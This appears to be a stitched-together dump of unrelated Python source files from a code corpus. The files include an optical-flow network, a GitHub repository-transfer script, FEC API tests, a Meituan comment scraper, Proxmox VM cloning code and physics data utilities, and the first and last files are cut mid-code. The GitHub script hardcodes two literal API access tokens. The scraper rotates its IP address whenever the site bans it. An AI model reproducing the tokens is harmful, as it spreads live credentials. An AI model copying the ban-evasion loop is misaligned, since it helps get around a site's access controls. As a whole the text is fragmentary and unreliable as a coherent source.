assert list(form.field.iter_choices()) == [("yes", "Yes", False), ("no", "No", True)]
| StarcoderdataPython |
26064 | import torch
import torch.nn as nn
import torch.nn.functional as F
from ..decoder import ConvDecoder
from ..encoder import build_encoder
from ..modules import conv, deconv
from ..similarity import CorrelationLayer
from ..utils import warp
from .build import MODEL_REGISTRY
@MODEL_REGISTRY.register()
class PWCNet(nn.Module):
"""
Implementation of the paper
`PWC-Net: CNNs for Optical Flow Using Pyramid, Warping, and Cost Volume <https://arxiv.org/abs/1709.02371>`_
Parameters
----------
cfg : :class:`CfgNode`
Configuration for the model
"""
def __init__(self, cfg):
super(PWCNet, self).__init__()
self.cfg = cfg
self.encoder = build_encoder(cfg.ENCODER)
self.correlation_layer = CorrelationLayer(
pad_size=cfg.SIMILARITY.PAD_SIZE,
max_displacement=cfg.SIMILARITY.MAX_DISPLACEMENT,
)
search_range = (2 * cfg.SIMILARITY.MAX_DISPLACEMENT + 1) ** 2
self.decoder_layers = nn.ModuleList()
decoder_cfg = cfg.DECODER.CONFIG
self.up_feature_layers = nn.ModuleList()
for i in range(len(decoder_cfg)):
if i == 0:
concat_channels = search_range
else:
concat_channels = (
search_range + decoder_cfg[i] + cfg.SIMILARITY.MAX_DISPLACEMENT
)
self.decoder_layers.append(
ConvDecoder(
config=decoder_cfg,
to_flow=True,
concat_channels=concat_channels,
)
)
self.up_feature_layers.append(
deconv(
concat_channels + sum(decoder_cfg),
2,
kernel_size=4,
stride=2,
padding=1,
)
)
self.deconv_layers = nn.ModuleList()
for i in range(len(decoder_cfg)):
self.deconv_layers.append(deconv(2, 2, kernel_size=4, stride=2, padding=1))
self.dc_conv = nn.ModuleList(
[
conv(
search_range
+ cfg.SIMILARITY.MAX_DISPLACEMENT
+ decoder_cfg[-1]
+ sum(decoder_cfg),
128,
kernel_size=3,
stride=1,
padding=1,
dilation=1,
),
]
)
self.dc_conv.append(
conv(
decoder_cfg[0],
decoder_cfg[0],
kernel_size=3,
stride=1,
padding=2,
dilation=2,
)
)
padding = 4
dilation = 4
for i in range(len(decoder_cfg) - 2):
self.dc_conv.append(
conv(
decoder_cfg[i],
decoder_cfg[i + 1],
kernel_size=3,
stride=1,
padding=padding,
dilation=dilation,
)
)
padding *= 2
dilation *= 2
self.dc_conv.append(
conv(
decoder_cfg[3],
decoder_cfg[4],
kernel_size=3,
stride=1,
padding=1,
dilation=1,
)
)
self.dc_conv.append(
nn.Conv2d(32, 2, kernel_size=3, stride=1, padding=1, bias=True)
)
self.dc_conv = nn.Sequential(*self.dc_conv)
self._init_weights()
def _init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):
nn.init.kaiming_normal_(m.weight.data, mode="fan_in")
if m.bias is not None:
m.bias.data.zero_()
def _corr_relu(self, features1, features2):
corr = self.correlation_layer(features1, features2)
return F.leaky_relu(corr, negative_slope=0.1)
def forward(self, img1, img2):
"""
Performs forward pass of the network
Parameters
----------
img1 : torch.Tensor
Image to predict flow from
img2 : torch.Tensor
Image to predict flow to
Returns
-------
torch.Tensor
Flow from img1 to img2
"""
H, W = img1.shape[-2:]
feature_pyramid1 = self.encoder(img1)
feature_pyramid2 = self.encoder(img2)
up_flow, up_features = None, None
up_flow_scale = 0.625
flow_preds = []
for i in range(len(self.decoder_layers)):
if i == 0:
corr = self._corr_relu(feature_pyramid1[i], feature_pyramid2[i])
concatenated_features = corr
else:
warped_features = warp(feature_pyramid2[i], up_flow * up_flow_scale)
up_flow_scale *= 2
corr = self._corr_relu(feature_pyramid1[i], warped_features)
concatenated_features = torch.cat(
[corr, feature_pyramid1[i], up_flow, up_features], dim=1
)
flow, features = self.decoder_layers[i](concatenated_features)
flow_preds.append(flow)
up_flow = self.deconv_layers[i](flow)
up_features = self.up_feature_layers[i](features)
flow_preds.reverse()
flow_preds[0] += self.dc_conv(features)
if self.training:
return flow_preds
else:
flow = flow_preds[0]
if self.cfg.INTERPOLATE_FLOW:
H_, W_ = flow.shape[-2:]
flow = F.interpolate(
flow, img1.shape[-2:], mode="bilinear", align_corners=True
)
flow_u = flow[:, 0, :, :] * (W / W_)
flow_v = flow[:, 1, :, :] * (H / H_)
flow = torch.stack([flow_u, flow_v], dim=1)
if self.cfg.FLOW_SCALE_FACTOR is not None:
flow *= self.cfg.FLOW_SCALE_FACTOR
return flow
| StarcoderdataPython |
11264259 | def demographyStep():
pass
| StarcoderdataPython |
8021668 | import json
import requests
import sys
from mako.template import Template
def main():
data = json.loads(open('commands.json').read())
text = Template(filename=sys.argv[1]).render(data=data)
payload = {'markup_type': 'html', 'markup': text, 'comments': 'y'}
requests.post('http://dev.bukkit.org/bukkit-plugins/incorporate/pages/main/edit/?api-key='+sys.argv[2], payload)
if __name__ == '__main__':
main()
| StarcoderdataPython |
3376344 | <filename>mediaServer/exceptions.py
class JellyfinException(Exception):
pass
class JellyfinBadRequest(JellyfinException):
pass
class JellyfinUnauthorized(JellyfinException):
pass
class JellyfinForbidden(JellyfinException):
pass
class JellyfinResourceNotFound(JellyfinException):
pass
class JellyfinServerError(JellyfinException):
pass | StarcoderdataPython |
214445 | # -*- coding: utf-8 -*-
import json
import re
import requests
ACCESS_TOKEN = '7a285e8f48f85958dd04257966be69c6c57e519c'
BASE_URL = 'https://www-github3.cisco.com/api/v3'
PUBLIC_ACCESS_TOKEN = '4d3ad44f6df3447de0e977ad67b04a8787b8e03c'
PUBLIC_BASE_URL = 'https://api.github.com'
def get_session(access_token=None, base_url=None):
headers = {
'Authorization': 'token {}'.format(access_token),
'Accept': 'application/vnd.github.mercy-preview+json'
}
session = requests.Session()
session.headers.update(headers)
session.base_url = base_url
return session
def parse_links(headers=None):
if 'Link' not in headers:
return None
link_str = headers['Link']
_links = link_str.replace(' ', '').split(',')
base_pattern = r'^<(.*)>;rel="(.*)"$'
ret = {}
for l in _links:
m = re.match(base_pattern, l)
if m:
url, rel = m.groups()[0], m.groups()[1]
ret[rel] = url
return ret
def search_repos(session=None, url=None, search_query=None):
repos = []
if not url:
url = "{base_url}/search/repositories?q={search_query}".format(base_url=session.base_url, search_query=search_query)
req = session.get(url)
if not req.ok:
raise ValueError('Failed search repos repos [%s]. %s', url, req.reason)
data = req.json()
repos = repos + data['items']
links = parse_links(req.headers)
if links and 'next' in links:
repos = repos + search_repos(session=session, url=links['next'])
return repos
def transfer(session=None, repo=None, new_owner=None):
data = {"new_owner": new_owner}
repo_name = repo['name']
old_owner = repo['owner']['login']
url = "{base_url}/repos/{owner}/{repo}/transfer".format(base_url=session.base_url, owner=old_owner, repo=repo_name)
req = session.post(url=url, data=json.dumps(data))
print('Transfering repo %s/%s', old_owner, repo_name)
if not req.ok:
raise ValueError('Failed to transfer repo %s/%s', old_owner, repo_name)
print(req.status_code)
def rename(session=None, repo=None):
old_name = repo['name']
owner = repo['owner']['login']
pattern = r'^gruntwork-(.+)$'
m = re.match(pattern=pattern, string=old_name)
if not m:
print("skipping renaming of %s", old_name)
return
else:
new_name = m.groups()[0]
print('renaming repo %s/%s->%s' % (old_name, owner, new_name))
url = "{base_url}/repos/{owner}/{repo}".format(base_url=session.base_url, owner=owner, repo=old_name)
data = {'name': new_name}
req = session.patch(url=url, data=json.dumps(data))
if not req.ok:
raise ValueError('Failed to transfer repo %s/%s', old_owner, repo_name)
print(req.status_code)
def update_collaborations(session=None, owner=None, repo=None, collaborator=None):
# url = "{base_url}/repos/{owner}/{repo}/collaborators/{collaborator}".format(base_url=session.base_url, owner=owner, repo=repo, collaborator=collaborator)
# url = "{base_url}/orgs/{owner}/teams/{collaborator}/repos/{owner}/{repo}".format(base_url=session.base_url, owner=owner, repo=repo, collaborator=collaborator)
# url = "{base_url}/orgs/{owner}/teams".format(base_url=session.base_url, owner=owner, repo=repo, collaborator=collaborator)
url = "{base_url}/teams/109/repos/{owner}/{repo}".format(base_url=session.base_url, owner=owner, repo=repo, collaborator=collaborator)
"""/orgs/:org/teams"""
'''/orgs/:org/teams/:team_slug/repos/:owner/:repo'''
"""/orgs/:org/teams/:team_slug/repos/:owner/:repo"""
"""/orgs/:org/teams/:team_slug/repos"""
"""/teams/:team_id/repos/:owner/:repo"""
params = {'permission': 'pull'}
print(url)
session.headers.update({'Content-Length': '0'})
req = session.put(url=url, params=params)
# req = session.get(url=url)
# print(json.dumps(req.json(), indent=4))
if not req.ok:
print(req.status_code)
print(req.reason)
raise ValueError('Failed to add collaborator repo %s/%s' % (owner, repo))
#
print(req.status_code)
"""
'Link': '<https://api.github.com/search/repositories?q=is%3Aprivate+org%3Agruntwork-io&page=2>; rel="next", <https://api.github.com/search/repositories?q=is%3Aprivate+org%3Agruntwork-io&page=2>; rel="last"',
'Link': '<https://api.github.com/search/repositories?q=is%3Aprivate+org%3Agruntwork-io&page=1>; rel="prev", <https://api.github.com/search/repositories?q=is%3Aprivate+org%3Agruntwork-io&page=1>; rel="first"',
"""
def update_branch_protections():
data = {
"enforce_admins": True,
"required_pull_request_reviews": {
"dismissal_restrictions": {
"teams": [
"gruntwork-io"
]
},
"dismiss_stale_reviews": True,
"require_code_owner_reviews": True,
"required_approving_review_count": 1
},
"restrictions": {
"users": [
"octocat"
],
"teams": [
"justice-league"
],
"apps": [
"super-ci"
]
},
"required_linear_history": True,
"allow_force_pushes": False,
"allow_deletions": False
}
pass
def go():
s = get_session(access_token=PUBLIC_ACCESS_TOKEN, base_url=PUBLIC_BASE_URL)
s = get_session(access_token=ACCESS_TOKEN, base_url=BASE_URL)
repos = search_repos(session=s, search_query='is:private+org:gruntwork-io')
print(len(repos))
print(json.dumps(repos, indent=4))
go()
| StarcoderdataPython |
11318426 | <reponame>dwillis/openFEC<filename>tests/test_itemized.py
import datetime
import sqlalchemy as sa
from tests import factories
from tests.common import ApiBaseTest
from webservices.rest import api
from webservices.schemas import ScheduleASchema
from webservices.schemas import ScheduleBSchema
from webservices.resources.sched_a import ScheduleAView
from webservices.resources.sched_b import ScheduleBView
from webservices.resources.sched_e import ScheduleEView
class TestItemized(ApiBaseTest):
def test_fields(self):
params = [
(factories.ScheduleAFactory, ScheduleAView, ScheduleASchema),
(factories.ScheduleBFactory, ScheduleBView, ScheduleBSchema),
]
for factory, resource, schema in params:
factory()
results = self._results(api.url_for(resource))
self.assertEqual(len(results), 1)
self.assertEqual(results[0].keys(), schema().fields.keys())
def test_sorting(self):
receipts = [
factories.ScheduleAFactory(report_year=2014, contribution_receipt_date=datetime.date(2014, 1, 1)),
factories.ScheduleAFactory(report_year=2012, contribution_receipt_date=datetime.date(2012, 1, 1)),
factories.ScheduleAFactory(report_year=1986, contribution_receipt_date=datetime.date(1986, 1, 1)),
]
response = self._response(api.url_for(ScheduleAView, sort='contribution_receipt_date'))
self.assertEqual(
[each['report_year'] for each in response['results']],
[2012, 2014]
)
self.assertEqual(
response['pagination']['last_indexes'],
{
'last_index': receipts[0].sched_a_sk,
'last_contribution_receipt_date': receipts[0].contribution_receipt_date.isoformat(),
}
)
def test_sorting_bad_column(self):
response = self.app.get(api.url_for(ScheduleAView, sort='bad_column'))
self.assertEqual(response.status_code, 422)
self.assertIn(b'Cannot sort on value', response.data)
def test_filter(self):
[
factories.ScheduleAFactory(contributor_state='NY'),
factories.ScheduleAFactory(contributor_state='CA'),
]
results = self._results(api.url_for(ScheduleAView, contributor_state='CA'))
self.assertEqual(len(results), 1)
self.assertEqual(results[0]['contributor_state'], 'CA')
def test_filter_case_insensitive(self):
[
factories.ScheduleAFactory(contributor_city='NEW YORK'),
factories.ScheduleAFactory(contributor_city='DES MOINES'),
]
results = self._results(api.url_for(ScheduleAView, contributor_city='new york'))
self.assertEqual(len(results), 1)
self.assertEqual(results[0]['contributor_city'], 'NEW YORK')
def test_filter_fulltext(self):
names = ['<NAME>', '<NAME>']
filings = [
factories.ScheduleAFactory(contributor_name=name)
for name in names
]
[
factories.ScheduleASearchFactory(
sched_a_sk=filing.sched_a_sk,
contributor_name_text=sa.func.to_tsvector(name),
)
for filing, name in zip(filings, names)
]
results = self._results(api.url_for(ScheduleAView, contributor_name='soros'))
self.assertEqual(len(results), 1)
self.assertEqual(results[0]['contributor_name'], '<NAME>')
def test_filter_fulltext_employer(self):
employers = ['Acme Corporation', 'Vandelay Industries']
filings = [
factories.ScheduleAFactory(contributor_employer=employer)
for employer in employers
]
[
factories.ScheduleASearchFactory(
sched_a_sk=filing.sched_a_sk,
contributor_employer_text=sa.func.to_tsvector(employer),
)
for filing, employer in zip(filings, employers)
]
results = self._results(api.url_for(ScheduleAView, contributor_employer='vandelay'))
self.assertEqual(len(results), 1)
self.assertEqual(results[0]['contributor_employer'], '<NAME>')
def test_filter_fulltext_occupation(self):
occupations = ['Attorney at Law', 'Doctor of Philosophy']
filings = [
factories.ScheduleAFactory(contributor_occupation=occupation)
for occupation in occupations
]
[
factories.ScheduleASearchFactory(
sched_a_sk=filing.sched_a_sk,
contributor_occupation_text=sa.func.to_tsvector(occupation),
)
for filing, occupation in zip(filings, occupations)
]
results = self._results(api.url_for(ScheduleAView, contributor_occupation='doctor'))
self.assertEqual(len(results), 1)
self.assertEqual(results[0]['contributor_occupation'], 'Doctor of Philosophy')
def test_pagination(self):
filings = [
factories.ScheduleAFactory()
for _ in range(30)
]
page1 = self._results(api.url_for(ScheduleAView))
self.assertEqual(len(page1), 20)
self.assertEqual(
[each['sched_a_sk'] for each in page1],
[each.sched_a_sk for each in filings[:20]],
)
page2 = self._results(api.url_for(ScheduleAView, last_index=page1[-1]['sched_a_sk']))
self.assertEqual(len(page2), 10)
self.assertEqual(
[each['sched_a_sk'] for each in page2],
[each.sched_a_sk for each in filings[20:]],
)
def test_pagination_bad_per_page(self):
response = self.app.get(api.url_for(ScheduleAView, per_page=999))
self.assertEqual(response.status_code, 422)
def test_pdf_url(self):
# TODO(jmcarp) Refactor as parameterized tests
image_number = 39
params = [
(factories.ScheduleAFactory, ScheduleAView),
(factories.ScheduleBFactory, ScheduleBView),
]
for factory, resource in params:
factory(image_number=image_number)
results = self._results(api.url_for(resource))
self.assertEqual(len(results), 1)
self.assertEqual(
results[0]['pdf_url'],
'http://docquery.fec.gov/cgi-bin/fecimg/?{0}'.format(image_number),
)
def test_image_number(self):
image_number = '12345'
[
factories.ScheduleAFactory(),
factories.ScheduleAFactory(image_number=image_number),
]
results = self._results(api.url_for(ScheduleAView, image_number=image_number))
self.assertEqual(len(results), 1)
self.assertEqual(results[0]['image_number'], image_number)
def test_image_number_range(self):
[
factories.ScheduleAFactory(image_number='1'),
factories.ScheduleAFactory(image_number='2'),
factories.ScheduleAFactory(image_number='3'),
factories.ScheduleAFactory(image_number='4'),
]
results = self._results(api.url_for(ScheduleAView, min_image_number='2'))
self.assertTrue(all(each['image_number'] >= '2' for each in results))
results = self._results(api.url_for(ScheduleAView, max_image_number='3'))
self.assertTrue(all(each['image_number'] <= '3' for each in results))
results = self._results(api.url_for(ScheduleAView, min_image_number='2', max_image_number='3'))
self.assertTrue(all('2' <= each['image_number'] <= '3' for each in results))
def test_memoed(self):
params = [
(factories.ScheduleAFactory, ScheduleAView),
(factories.ScheduleBFactory, ScheduleBView),
]
for factory, resource in params:
[
factory(),
factory(memo_code='X'),
]
results = self._results(api.url_for(resource))
self.assertFalse(results[0]['memoed_subtotal'])
self.assertTrue(results[1]['memoed_subtotal'])
def test_amount_sched_a(self):
[
factories.ScheduleAFactory(contribution_receipt_amount=50),
factories.ScheduleAFactory(contribution_receipt_amount=100),
factories.ScheduleAFactory(contribution_receipt_amount=150),
factories.ScheduleAFactory(contribution_receipt_amount=200),
]
results = self._results(api.url_for(ScheduleAView, min_amount=100))
self.assertTrue(all(each['contribution_receipt_amount'] >= 100 for each in results))
results = self._results(api.url_for(ScheduleAView, max_amount=150))
self.assertTrue(all(each['contribution_receipt_amount'] <= 150 for each in results))
results = self._results(api.url_for(ScheduleAView, min_amount=100, max_amount=150))
self.assertTrue(all(100 <= each['contribution_receipt_amount'] <= 150 for each in results))
def test_amount_sched_b(self):
[
factories.ScheduleBFactory(disbursement_amount=50),
factories.ScheduleBFactory(disbursement_amount=100),
factories.ScheduleBFactory(disbursement_amount=150),
factories.ScheduleBFactory(disbursement_amount=200),
]
results = self._results(api.url_for(ScheduleBView, min_amount=100))
self.assertTrue(all(each['disbursement_amount'] >= 100 for each in results))
results = self._results(api.url_for(ScheduleBView, max_amount=150))
self.assertTrue(all(each['disbursement_amount'] <= 150 for each in results))
results = self._results(api.url_for(ScheduleBView, min_amount=100, max_amount=150))
self.assertTrue(all(100 <= each['disbursement_amount'] <= 150 for each in results))
def test_amount_sched_e(self):
[
factories.ScheduleEFactory(expenditure_amount=50),
factories.ScheduleEFactory(expenditure_amount=100),
factories.ScheduleEFactory(expenditure_amount=150),
factories.ScheduleEFactory(expenditure_amount=200),
]
results = self._results(api.url_for(ScheduleEView, min_amount=100))
self.assertTrue(all(each['expenditure_amount'] >= 100 for each in results))
results = self._results(api.url_for(ScheduleAView, max_amount=150))
self.assertTrue(all(each['expenditure_amount'] <= 150 for each in results))
results = self._results(api.url_for(ScheduleAView, min_amount=100, max_amount=150))
self.assertTrue(all(100 <= each['expenditure_amount'] <= 150 for each in results))
| StarcoderdataPython |
1752663 | import constants
import json
import requests
import pickle
import time
import re,sys
import string
from ip_modifier import change_ip
CRAWL_SUCCESS = 0
IP_BANNED = -1
OTHER_EXCEPTION = 1
class comment_crawler:
poi_id = 0
disable_cnt = 0
def __init__(self, poi_id):
self.poi_id = poi_id
def real_crawl_poi_comment(self):
success = True
msg = CRAWL_SUCCESS
url = constants.meituan_comment
headers = {
"User-Agent" : "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36",
"Referer" : "https://meishi.meituan.com/i/",
"Accept" : "application/json",
"Content-Type" : "application/json",
"x-requested-with" : "XMLHttpRequest"
}
data = json.dumps({
"poiId": self.poi_id
})
ret = []
try:
r = requests.post(url, headers = headers, data = data)
return_msg = json.loads(r.text)
status = dict(return_msg)['status']
if status != 0:
raise Exception("+++++comment: return status is not 0+++++")
data_list = list(dict(dict(return_msg)['data'])['list'])
ret = data_list
except Exception as e:
print("=====exception occurs when crawling comments=====")
print("=====the exception reason=====")
print(e)
print("=====exception message=====")
print(r.text)
success = False
msg = IP_BANNED
jsn = json.loads(r.text)
if type(jsn) == dict:
dict_jsn = dict(jsn)
if 'code' in dict_jsn.keys() and dict_jsn['code']==406:
msg = IP_BANNED
finally:
return success, msg, ret
def crawl_poi_comment(self):
ret = []
disable_cnt = 0
while True:
success_label, msg, ret = self.real_crawl_poi_comment()
if success_label:
break
elif msg == IP_BANNED:
disable_cnt += 1
change_ip()
time.sleep(7)
else:
disable_cnt += 1
time.sleep(7)
print("=====comment crawl: retry count %d=====" % disable_cnt)
if disable_cnt > 10:
break
return ret
| StarcoderdataPython |
227619 | <filename>ec2_functions.py
import proxmox_api
import time
import paramiko
import json
import pexpect
# import subprocess
# from subprocess import Popen, PIPE, check_call
def vm_copy_and_setup(public_key, proxmox, vm_id):
proxmox.clone_vm("pve", 102, vm_id)
ready = False
#Wait until the vm is done cloning before continuing
while(not ready):
data = proxmox.get_vm_status("pve", vm_id)
if data is not None:
data = data["data"]
if "lock" in data:
ready = True
time.sleep(20)
#standard login info for the vm template
username = "test"
password = b"<PASSWORD>"
time.sleep(150)
ready = False
proxmox.start_vm("pve", vm_id)
while(not ready):
proxmox.start_vm("pve", vm_id)
data = proxmox.get_vm_status("pve", vm_id)
if data is not None and data["data"] is not None:
data = data["data"]
if data["status"] == "running":
ready = True
time.sleep(20)
vm_ip = proxmox.get_vm_ip_addr("pve", vm_id)
while vm_ip == False:
time.sleep(10)
vm_ip = proxmox.get_vm_ip_addr("pve", vm_id)
time.sleep(100)
ssh_session = paramiko.SSHClient()
ssh_session.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_session.connect(vm_ip, username=username, password=password)
ready = False
while(not ready):
ssh_session.connect(vm_ip, username=username, password=password)
time.sleep(20)
if ssh_session.get_transport() is not None:
if ssh_session.get_transport().is_active():
ready = True
ssh_session.exec_command("mkdir -p ~/.ssh/")
ssh_session.exec_command("chown -R test:test .ssh")
key_file = open("authorized_keys", "w")
key_file.write(public_key)
key_file.close()
#Copy ssh key
p = pexpect.spawn("scp -o StrictHostKeyChecking=no authorized_keys test@%s:/home/test/.ssh/authorized_keys"%vm_ip)
p.expect("test@.*'s password:.*")
p.sendline(password)
time.sleep(10)
p.close()
ssh_session.exec_command("sudo sed -i -e 's/PasswordAuthentication yes/PasswordAuthentication no/g' /etc/ssh/sshd_config")
ssh_session.close()
#Switch to the external internet facing network
proxmox.change_network("pve", vm_id, "vmbr0")
time.sleep(30)
proxmox.stop_vm("pve", vm_id)
while proxmox.get_vm_status("pve", vm_id)["data"]["status"] != "stopped":
time.sleep(10)
proxmox.start_vm("pve", vm_id)
def get_info(proxmox, vm_id):
vm_status = ""
status_data = proxmox.get_vm_status("pve", vm_id)
if "data" in status_data:
if "status" in status_data["data"]:
vm_status = status_data["data"]["status"]
vm_ip = proxmox.get_vm_ip_addr("pve", vm_id)
if vm_ip == False:
return False
else:
data = {"status" : vm_status, "ip" : vm_ip}
return json.dumps(data)
def delete_vm(proxmox, vm_id):
proxmox.stop_vm("pve", vm_id)
while proxmox.get_vm_status("pve", vm_id)["data"]["status"] != "stopped":
time.sleep(10)
return proxmox.delete_vm("pve", vm_id)
| StarcoderdataPython |
1740848 | # -*- coding: utf-8 -*-
import os
import json
from pymatgen import MPRester
data = {}
with MPRester() as mpr:
for i, d in enumerate(
mpr.query(criteria={}, properties=["task_ids", "pretty_formula"])
):
for task_id in d["task_ids"]:
data[task_id] = d["pretty_formula"]
out = os.path.join(os.path.dirname(__file__), "formulae.json")
with open(out, "w") as f:
json.dump(data, f)
| StarcoderdataPython |
3582971 | <reponame>CHUV-DS/RDF-i2b2-converter<filename>src/scripts/merge_metavaluefields.py<gh_stars>0
import os
import sys
import pandas as pd
import pdb
import json
myPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, myPath)
MIGRATIONS = {
"swissbioref:hasLabResultValue" : {
"concept":"sphn:LabResult",
"destination": ["swissbioref:hasLabResultLabTestCode/*"],
"xmlvaluetype":"Float"
},
"sphn:hasDateTime":{
"concept":"sphn:BirthDate",
"destination":["."],
"xmlvaluetype":"Integer"
},
"sphn:hasBodyWeightValue":{
"concept":"sphn:BodyWeight",
"destination":["."],
"xmlvaluetype":"PosFloat"
},
"swissbioref:hasAgeValueFAIL":{
"concept":"sphn:Biosample",
"destination":["swissbioref:hasSubjectAge\swissbioref:Age"],
"xmlvaluetype":"PosFloat"
}
}
def extract_parent_id(row):
# tool to retrieve the short URI of the parent element in the i2b2 ontology file
if pd.isnull(row["C_PATH"]) :
return row[["M_APPLIED_PATH"]].str.extract(r'.*\\([^\\]+)\\')[0]["M_APPLIED_PATH"]
else :
return row[["C_PATH"]].str.extract(r'.*\\([^\\]+)\\')[0]["C_PATH"]
def resolve_rows(df, destdic):
"""
The destination field is a list of paths pointing to destination elements.
The '*' character is a shortcut for "all children from this point".
"""
destination = destdic["destination"]
conc = destdic["concept"]
conc_row = df.loc[df["C_FULLNAME"].str.contains(conc)]
if len(conc_row.index)>1:
raise Exception("Several matches for migration destination of destdic")
res_idx = pd.Index([])
if conc_row["C_TABLENAME"].values[0]!="CONCEPT_DIMENSION":
return res_idx
for path in destination:
if path == ".":
idces = conc_row
elif "*" in path:
npath= path[:path.find("/*")]
idces = df.loc[df["C_FULLNAME"].str.contains(npath) & df["M_APPLIED_PATH"].str.contains(conc)]
else:
idces = df.loc[df["C_FULLNAME"] == ("\\"+path+"\\") & df["M_APPLIED_PATH"].str.contains(conc)]
res_idx = res_idx.union(idces.index)
return res_idx
def merge_metadatavaluefields(output_tables_loc):
globals()["OUTPUT_TABLES_LOCATION"] = output_tables_loc
globals()["METADATA_LOC"] = output_tables_loc + "METADATA.csv"
logs = {}
df = pd.read_csv(METADATA_LOC)
# get the shortened URI that trails the full path
dfk=df.assign(key=df["C_FULLNAME"].str.extract(r'.*\\([^\\]+)\\'))
# get the positions of the lines to be deleted and digested into other lines
to_digest = dfk.loc[dfk["C_METADATAXML"].notnull() & dfk["key"].isin(MIGRATIONS.keys())]
values = pd.DataFrame(columns=["C_METADATAXML"])
moved = pd.Index([])
for ix,row in to_digest.iterrows():
destdic = MIGRATIONS[row["key"]]
# Check it's the good item related to the good parent
if destdic["concept"] != extract_parent_id(row):
print("Concept does not match at ", destdic["concept"], "could not migrate")
continue
# find out which rows should receive this xml
destination_indexes= resolve_rows(dfk[["C_FULLNAME", "C_PATH", "M_APPLIED_PATH", "C_TABLENAME"]], destdic)
if len(destination_indexes)==0:
continue
# change type if necessary in the xml frame
if "xmlvaluetype" in destdic.keys():
xmls = row[["C_METADATAXML"]].str.replace("(?<=<DataType>).*?(?=<\/DataType>)", destdic["xmlvaluetype"], regex=True)
xml = xmls["C_METADATAXML"]
else:
xml = row["C_METADATAXML"]
logs.update({row["C_BASECODE"]:df.loc[destination_indexes, "C_BASECODE"].tolist()})
# For each found index, store it into the temporary table
df.loc[destination_indexes, "C_METADATAXML"] = xml
moved = moved.union([ix])
df=df.drop(moved)
df.to_csv(METADATA_LOC, index=False)
with open(OUTPUT_TABLES_LOCATION+'migrations_logs.json', 'w') as outfile:
json.dump(logs, outfile)
| StarcoderdataPython |
3521847 | <filename>data_mgmt/generate_data.py<gh_stars>0
# -*- coding: utf-8 -*-
from fn_utils import make_fn_name, make_fn_desc
from fn_utils import make_row, flip_data_str_signs
from fn_utils import write_row
from ESD.data._utils import generate_func_string
from fn_data import C1_xdata, C1_ydata
from fn_data import C2_xdata, C2_ydata
from fn_data import C3_xdata, C3_ydata
from fn_data import C4_xdata, C4_ydata
from fn_data import C4S4_xdata, C4S4_ydata
from fn_data import C9Q10_xdata, C9Q10_ydata
from fn_data import C_S1_xdata, C_S1_ydata
from fn_data import C_S2_xdata, C_S2_ydata
from fn_data import S1_xdata, S1_ydata
from fn_data import S2_xdata, S2_ydata
from fn_data import S4_xdata, S4_ydata
from fn_data import H3_xdata, H3_ydata
from fn_data import H1_xdata, H1_ydata
from fn_data import Q1_xdata, Q1_ydata
from fn_data import Q1_xdata_, Q1_ydata_
from fn_data import Q2_xdata, Q2_ydata
from fn_data import Q2_xdata_, Q2_ydata_
from fn_data import Q3_xdata, Q3_ydata
from fn_data import Q4_xdata, Q4_ydata
from fn_data import Q5_xdata, Q5_ydata
from fn_data import Q6_xdata, Q6_ydata
from fn_data import Q6_xdata_, Q6_ydata_
from fn_data import Q8_xdata, Q8_ydata
from fn_data import Q9_xdata, Q9_ydata
from fn_data import QUAD_FSQ1_xdata, QUAD_FSQ1_ydata
from fn_data import QUAD_FSQ2_xdata, QUAD_FSQ2_ydata
from fn_data import QUAD_FSQ5_xdata, QUAD_FSQ5_ydata
from fn_data import BEND_FSD1_SCD1_xdata, BEND_FSD1_SCD1_ydata
from fn_data import BEND_FSD1_SCD2_xdata, BEND_FSD1_SCD2_ydata
from fn_data import SEXT_FSQ2_xdata, SEXT_FSQ2_ydata
from fn_data import SEXT_FSQ5_xdata, SEXT_FSQ5_ydata
from fn_data import OCT_FSQ2_xdata, OCT_FSQ2_ydata
from fn_data import OCT_FSQ5_xdata, OCT_FSQ5_ydata
from fn_templates import fn_prop, fn_prop_reversed
from fn_templates import fn_quad, fn_quad_reversed, fn_quad_
from fn_egroups import C1_elements, C2_elements, C3_elements, \
C4_elements, C4S4_elements, \
C_S1_elements, C_S2_elements, C9Q10_elements
from fn_egroups import Q1_elements, Q1_elements_, \
Q2_elements, Q2_elements_, \
Q3_elements_, \
Q4_elements, \
Q5_elements_, \
Q6_elements, Q6_elements_, \
Q8_elements, Q9_elements
from fn_egroups import S1_elements, S2_elements, S4_elements
from fn_egroups import H1_elements, H1_elements_, H3_elements_
from fn_egroups import BEND_FSD1_SCD1_elements, BEND_FSD1_SCD2_elements
from fn_egroups import QUAD_FSQ1_elements
from fn_egroups import QUAD_FSQ2_elements, SEXT_FSQ2_elements, OCT_FSQ2_elements
from fn_egroups import QUAD_FSQ5_elements, SEXT_FSQ5_elements, OCT_FSQ5_elements
def make_rows_COR_SOL(ename, k, xdata, ydata,
params="x,k", phy_field="TM", eng_field="I",
dtype="COR", **kws):
#
# make rows for correctors and solenoieds
# key argu: k_ to define "-" k if not -k.
# for cor:
# k,(x,y)data are defined for 'V',
# 'H' data could be got by flipping the signs.
#
if 'DCH' in ename and dtype == "COR":
k = kws.get('k_', -k)
ydata = flip_data_str_signs(ydata)
code_e2p = fn_prop.format(k=k)
code_p2e = fn_prop_reversed.format(k=k)
row_e2p = make_row(ename, phy_field, eng_field, False,
code_e2p, params, xdata, ydata, **kws)
row_p2e = make_row(ename, phy_field, eng_field, True,
code_p2e, params, ydata, xdata, **kws)
return [row_e2p, row_p2e]
def make_rows_QUAD(ename, xdata, ydata,
params="x,x1,a1,b1,c1,a2,b2,c2",
phy_field="B2", eng_field="I", **kws):
#
# make rows for quads
#
x1 = kws.pop('x1')
x1r = kws.pop('x1r')
a1 = kws.pop('a1')
b1 = kws.pop('b1')
c1 = kws.pop('c1')
a2 = kws.pop('a2')
b2 = kws.pop('b2')
c2 = kws.pop('c2')
polarity = kws.pop('polarity', 1)
if polarity == 1:
code_e2p = fn_quad.format(x1=x1, a1=a1, b1=b1, c1=c1, a2=a2, b2=b2, c2=c2)
else:
code_e2p = fn_quad_.format(x1=x1, a1=a1, b1=b1, c1=c1, a2=a2, b2=b2, c2=c2)
row_e2p = make_row(ename, phy_field, eng_field, False,
code_e2p, params, xdata, ydata, **kws)
if x1r is None:
row_p2e = None
